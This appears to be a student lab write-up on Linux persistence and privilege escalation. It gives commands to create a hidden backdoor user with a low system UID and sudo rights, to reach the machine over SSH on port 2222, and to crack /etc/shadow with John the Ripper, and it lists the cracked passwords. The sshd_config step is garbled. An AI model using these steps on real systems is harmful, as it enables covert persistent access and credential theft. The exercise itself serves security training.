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**Step 1: Shadow People**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Create a secret user named `sysd`. Make sure this user doesn't have a home folder created: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- useradd sysd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2. Give your secret user a password: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- passwd sysd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3. Give your secret user a system UID &lt; 1000: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- usermod -u 28 sysd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Give your secret user the same GID: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- groupmod -g 28 sysd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5. Give your secret user full `sudo` access without the need for a password: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-  usermod -aG sudo sysd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6. Test that `sudo` access works without your password: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sudo -l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sudo -lU sysd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sudo -v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sudo adduser frank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sudo deluser frank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**Step 2: Smooth Sailing**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1. Edit the `sshd_config` file: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8" r="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1. Restart the SSH service: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- sudo systemctl restart ssh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2. Exit the `root` account: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- exit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3. SSH to the target machine using your `sysd` account and port `2222`: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- ssh sysd@192.168.6.105 -p 2222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4. Use `sudo` to switch to the root user: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- sudo su root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1. SSH back to the system using your `sysd` account and port `2222`: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- ssh sysd@192.168.6.105 -p 2222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2. Escalate your privileges to the `root` user. Use John to crack the entire `/etc/shadow` file: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- sudo su root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- john /etc/shadow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sysadmin:passw0rd:18387:0:99999:7:::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student:Goodluck!:18387:0:99999:7:::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mitnik:trustno1:18387:0:99999:7:::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babbage:freedom:18387:0:99999:7:::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lovelace:dragon:18387:0:99999:7:::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stallman:computer:18387:0:99999:7:::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turing:lakers:18387:0:99999:7:::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sysd:password:18841:0:99999:7:::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